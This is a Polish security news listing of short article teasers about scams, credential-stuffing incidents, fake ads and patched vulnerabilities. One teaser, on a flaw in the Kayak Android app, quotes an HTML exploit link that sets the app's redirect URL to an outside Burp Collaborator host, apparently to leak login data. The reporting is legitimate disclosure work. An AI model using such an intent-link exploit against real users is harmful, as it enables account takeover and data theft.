Nowa funkcja jest obecnie w wersji beta i budzi na tyle duże zainteresowanie, że obecnie wchodząc na serwis https://canarytokens.org/generate i wybierając wygenerowanie numeru karty kredytowej, możemy spotkać się z takim komunikatem: Jeśli z kolei już się uda, otrzymamy tego typu numer: W założeniu mogę wygenerować dużą liczbę takich kart, autoryzacja…
Czytaj dalej »
Firma znana chyba przede wszystkim z hitu League of Legends poinformowała o incydencie na Twitterze: Poza tym, że użyto socjotechniki, niewiele więcej wiemy o incydencie. Warto jednak przypomnieć relatywnie niedawną akcję z kradzieżą kodów źródłowych Electronic Arts. W tym ostatnim przypadku historia była prosta (i również polegała na zaprzęgnięciu socjo):…
Czytaj dalej »
Parę miesięcy temu pisaliśmy o ciekawej podatności w appce mobilnej Tiktoka, a teraz świeżo załatana podatność w appce serwisu Kayak. Idąc od końca – wystarczyło podrzucić ofierze linka do strony, na której hostowany był tego typu exploicik (specyficznie przygotowany link): <!DOCTYPE html> <html> <body> <a id=”exploit” href=”jakis_intent://externalAuthentication#Intent;scheme=kayak;package=com.kayak.android;component=com.kayak.android.web.ExternalAuthLoginActivity;action=android.intent.action.VIEW;S.ExternalAuthLoginActivity.EXTRA_REDIRECT_URL=https://jsfl9yn414bp1z2sujwfjsj3ruxlla.burpcollaborator.net;end”>Exploit</a>; </body> </html> Jeśli…
Czytaj dalej »
Świeży mini case study, o którym poinformował nas czytelnik: Gdzie prowadzi ten wpis? Na pierwszy rzut oka wygląda, że do polsatnews.pl. Jeśli przypatrzycie się zrzutowi powyżej – nie ma tam żadnej literówki. Jeśli klikniecie w linka, wylądujecie… ze sporym prawdopodobieństwem na (prawdziwej) stronie www.polsatnews.pl Gdzie więc tutaj jest scam? W…
Czytaj dalej »
Jeden z czytelników przesłał nam dzisiaj rano takie zdjęcie: Z ciekawostek – tutaj lokalizacja tego miejsca na Google Street View: Gdzie prowadzi QR kod? Do adresu: drive.proton[.]me (usługa storage cloudowego od Protona). Tam z kolei plik .doc: oświadczenie_o_cudzoziemcach_przebywających_w_rp.doc wyglądający mniej więcej tak: Czy plik jest złośliwy? Wygląda na to, że…
Czytaj dalej »
Dyskusja dookoła tego tematu – tutaj. Historia obrazkowa w trzech częściach poniżej: Po kliknięciu w pierwszy wynik Googla, za pierwszym razem rzeczywiście u mnie pojawiał się efekt widoczny poniżej (kolejne próby – inne wyniki – to uwaga dla osób, które chcą sprawdzić problem własnoręcznie). Czy powyższy content został wygenerowany przez…
Czytaj dalej »
Dla odważnych – link do scamu: hxxps://www.facebook[.]com/Camping455/ Facebookowe tłumaczenie opisu do posta na j. polski jest dość kulawe, ale generalnie oszustom chodzi o to, żeby wpisać 'Gotowe’ w komentarzu. No więc w komentarzach mamy odmianę 'Gotowe’ z całego świata. Co się dzieje po kliknięciu przycisku 'Zarejestruj się’? Jesteśmy kierowani na…
Czytaj dalej »
Wersja clickbaitowa: „dzięki WiFi można widzieć przez ściany„. No dobra, przez ściany nie można widzieć z wykorzystaniem WiFi, ale być może osiągnięcie tego celu jest blisko. Pod koniec zeszłego roku pokazano drona, który jest w stanie „widzieć” urządzenia WiFi, które znajdują się za ścianą budynku. „Widzieć”, w sensie wskazać ich…
Czytaj dalej »
Ciekawa podatność, za którą Google wypłacił $13337. Jeśli wczytacie się w opis problemu, to w zasadzie… nie ma tam żadnego hackingu. Badacz zaczął od prób dobicia się (z poziomu Internetu) do pewnego adresu IP Googla, ale nieskutecznie. Na drodze stawał ekran logowania (Google Proxy). Żadna próba obejścia nie działała, a…
Czytaj dalej »
W pierwszym kwartale 2023 mamy dla Was duży pakiet promocji od Securitum! Przede wszystkim rabaty na najbliższe szkolenia oraz vouchery z cenami z roku 2022. Oprócz tego kilka nowości w formule „płać ile chcesz” oraz pakiety rosnących rabatów za zakup kilku szkoleń. Nadciąga też Cyberzbój v3. Przeczytajcie do końca. SZKOLENIA…
Czytaj dalej »
Jeśli ktoś czyta na bieżąco Sekuraka, to już ostatnio kilka razy widział alerty o fałszywych reklamach w Google. Również niektóre historie realnie kończyły się np. przejęciem konta googlowego ofiary. Jaka zmiana nastąpiła ostatnio? Fałszywych reklam jest jeszcze więcej, a ponadto potrafią pojawiać w grupach na pierwszej stronie wyników z Google….
Czytaj dalej »
Nie jest to spektakularny atak hakerski jak w przypadku ostatniej głośnej sprawy z LastPass, jednak warto zwrócić uwagę, co się zadziało. 1 grudnia 2022 r. pracownicy Gen Digital (dawniej Symantec Corporation i NortonLifeLock) zauważyli zwiększoną liczbę nieudanych logowań do kont użytkowników Norton Password Managera. Ruch ten zwiększał się każdego dnia,…
Czytaj dalej »
Zobaczcie appkę KeyDecoder (temat namierzony u @prywatnika). Wystarczy zrobić zdjęcie na tle obiektu o wielkości standardowej karty kredytowej i voilà: Twórca wyraźnie zaznacza, że dorabianie kluczy bez zgody właściciela jest nielegalne, a appka służy tylko celom edukacyjnym / legalnym zdaniom (np. pentesty): This Key Decoding app is meant to be…
Czytaj dalej »
Tomek opisuje w tym miejscu ciekawą historię scamu. Super „inwestycja”, wpłacasz 2000 zł, a zyskujesz 18000-20000 zł. Takich scamów jest tysiące, co w tym ciekawego? Ano to, że w pewnym momencie nasz rozmówca, w celu przekonania nas, że jednak to nie jest to scam ;) przesyła zdjęcie „swojego” dowodu osobistego….
Czytaj dalej »
Dysk widoczny na zdjęciu poniżej w cenie $100 – nawet jeśli wygląda jak no-name – jawi się jako super okazja. Podejrzanie dobra okazja. Im dłużej ekipa Review Geek analizowała widoczną powyżej okazję, pojawiało się znaków zapytania. Po pierwsze dostarczony kabel USB-C -> USB-A. Kopiowanie 16 TB po „starym” USB byłoby…
Czytaj dalej »
